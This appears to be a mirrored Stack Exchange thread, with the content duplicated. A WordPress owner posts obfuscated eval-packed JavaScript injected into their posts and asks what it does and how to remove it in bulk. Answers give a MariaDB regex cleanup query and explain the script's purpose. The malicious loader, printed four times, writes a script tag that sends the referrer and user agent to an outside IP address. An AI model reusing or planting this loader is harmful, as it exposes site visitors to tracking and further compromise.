admin管理员组

文章数量:1023744

Here is example of code I have seen inserted in two different posts: 

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkfkr|var|u0026u|referrer|fdrht||js|php'.split('|'),0,{}))
</script></noindex>

Second Example:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzfke|var|u0026u|referrer|dabzy||js|php'.split('|'),0,{}))
</script></noindex>

Why would hacker get out of this?

How can I do a mass-replace. Can I do a regex in MYSQL and update the WP-Posts directly? Seems like just a few letters are different on each one.

Here is example of code I have seen inserted in two different posts: 

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkfkr|var|u0026u|referrer|fdrht||js|php'.split('|'),0,{}))
</script></noindex>

Second Example:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzfke|var|u0026u|referrer|dabzy||js|php'.split('|'),0,{}))
</script></noindex>

Why would hacker get out of this?

How can I do a mass-replace. Can I do a regex in MYSQL and update the WP-Posts directly? Seems like just a few letters are different on each one.

  • hacked
Share Improve this question asked Apr 12, 2019 at 21:34 NealWaltersNealWalters 48810 silver badges21 bronze badges 1
  • Are you investigating this just for learning purposes? Or do you need help cleaning up an infected site? It's two questions in one thread. – user3135691 Commented Apr 12, 2019 at 22:25
Add a comment  | 

3 Answers 3

Reset to default 1

As I was using MariaDB, the following update did the fix: 

update wp_posts set post_content = REGEXP_REPLACE(post_content,'(*CRLF)<noindex>.*</noindex> ','')

See https://dba.stackexchange/questions/234774/mariadb-multiline-regex/234778#234778

I'm sorry to see your site has malicious code in it. Unfortunately, helping to fix compromised sites is outside the scope of this community.

I can answer your first question, though. This code appears to be garbled, but it is redirecting traffic from your site to some IP address with a path. I can't say exactly why, but this is usually to generate referral traffic, generate cryptocurrency, or compromise browsers in an effort to glean valuable personal information.

It's dangerous to your visitors to leave this code on your site.

There is lots of info on the googles (or bings, or ducks) about how to clean up a site. And it is true that your question is out of scope for this place.

But, it is something that is asked often. Code that you don't recognize is probably dangerous to your site and your visitors. (Like the code that was inside the "Yellow Pencil" theme, and other themes/plugins that have been compromised.)

So, cleaning is important. And it can be done, although it is a bit of work (I've done it for clients).

See my (accepted) answer here on my recommendations: Is this a hacking script in function.php? . If it was my site (or one that I manage), that's the procedure I would use to clean up a site.

Here is example of code I have seen inserted in two different posts: 

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkfkr|var|u0026u|referrer|fdrht||js|php'.split('|'),0,{}))
</script></noindex>

Second Example:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzfke|var|u0026u|referrer|dabzy||js|php'.split('|'),0,{}))
</script></noindex>

Why would hacker get out of this?

How can I do a mass-replace. Can I do a regex in MYSQL and update the WP-Posts directly? Seems like just a few letters are different on each one.

Here is example of code I have seen inserted in two different posts: 

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkfkr|var|u0026u|referrer|fdrht||js|php'.split('|'),0,{}))
</script></noindex>

Second Example:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzfke|var|u0026u|referrer|dabzy||js|php'.split('|'),0,{}))
</script></noindex>

Why would hacker get out of this?

How can I do a mass-replace. Can I do a regex in MYSQL and update the WP-Posts directly? Seems like just a few letters are different on each one.

  • hacked
Share Improve this question asked Apr 12, 2019 at 21:34 NealWaltersNealWalters 48810 silver badges21 bronze badges 1
  • Are you investigating this just for learning purposes? Or do you need help cleaning up an infected site? It's two questions in one thread. – user3135691 Commented Apr 12, 2019 at 22:25
Add a comment  | 

3 Answers 3

Reset to default 1

As I was using MariaDB, the following update did the fix: 

update wp_posts set post_content = REGEXP_REPLACE(post_content,'(*CRLF)<noindex>.*</noindex> ','')

See https://dba.stackexchange/questions/234774/mariadb-multiline-regex/234778#234778

I'm sorry to see your site has malicious code in it. Unfortunately, helping to fix compromised sites is outside the scope of this community.

I can answer your first question, though. This code appears to be garbled, but it is redirecting traffic from your site to some IP address with a path. I can't say exactly why, but this is usually to generate referral traffic, generate cryptocurrency, or compromise browsers in an effort to glean valuable personal information.

It's dangerous to your visitors to leave this code on your site.

There is lots of info on the googles (or bings, or ducks) about how to clean up a site. And it is true that your question is out of scope for this place.

But, it is something that is asked often. Code that you don't recognize is probably dangerous to your site and your visitors. (Like the code that was inside the "Yellow Pencil" theme, and other themes/plugins that have been compromised.)

So, cleaning is important. And it can be done, although it is a bit of work (I've done it for clients).

See my (accepted) answer here on my recommendations: Is this a hacking script in function.php? . If it was my site (or one that I manage), that's the procedure I would use to clean up a site.

本文标签: hackedWhy would a hacker add this code to each postand how to do mass cleanup

版权声明:本文标题:hacked - Why would a hacker add this code to each post, and how to do mass cleanup? 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://it.en369.cn/questions/1745586591a2157632.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。